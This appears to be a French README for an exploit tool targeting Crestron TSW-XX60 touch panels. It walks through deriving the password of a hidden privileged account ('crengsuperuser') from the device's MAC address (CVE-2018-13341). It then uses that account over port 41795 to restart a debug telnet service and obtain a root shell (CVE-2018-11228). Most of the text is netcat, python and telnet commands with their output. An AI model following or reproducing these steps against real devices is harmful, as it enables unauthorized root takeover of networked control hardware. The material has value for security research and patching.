
Cet outil vise à exploiter la CVE-2018-13341
Cet outil vise à exploiter la CVE-2018-13341. En utilisant l'adresse MAC de l'appareil ciblé, vous pouvez récupérer le mot de passe du compte caché "crengsuperuser" qui possède des privilèges élevés et vous permet d'exécuter des commandes SUDO.
Le protocole Crestron Toolbox (CTP) peut être utilisé en accédant au port 41795 sur l'appareil TSW-XX60.
# nc -C w.x.y.z 41795
TSW-760 Control Console
TSW-760> estat
The EST command has been made obsolete. Please use IPCONFIG instead.
Ethernet Adapter [XYZ]:
Link Status ....... : OK
DHCP .............. : ON
MAC Address ....... : 00.XX.XX.XX.XX.XX
IP Address ........ : [removed]
Subnet Mask ....... : [removed]
IPV6 Address ...... : [removed]
Default Gateway ... : [removed]
DNS Servers ........ : [removed] | DHCP |
[removed] | DHCP |
Cet outil nécessite le module CryptoGraphy.
# pip3 install cryptography
OU
# pip3 install -r requirements.txt
usage: exploit.py [-h] [-m MAC]
# Example
# python3 exploit.py -m aabbccddeeff
[*] Device MAC address: AAXXYYZZ
[*] Password for 'crengsuperuser': somerandompass
La CVE-2018-11228 permet une RCE non authentifiée via le service Bash Shell dans le protocole Crestron Terminal (CTP). Après avoir obtenu le mot de passe du compte caché "crengsuperuser", vous pouvez obtenir un accès root sur la machine.
# nc -C w.x.y.z 41795
TSW-760 Control Console
TSW-760> TELNETPORT OFF
Telnet Port: Off
TSW-760> SUDO RESTARTSERVICE telnetd_debug
Username: crengsuperuser
Password: **************
Service telnetd_debug restarted
TSW-760>
Ensuite, dans un nouveau shell, vous pouvez obtenir un accès root sur la machine.
# telnet w.x.y.z
bash# whoami
root
Credit Goes to : axcheron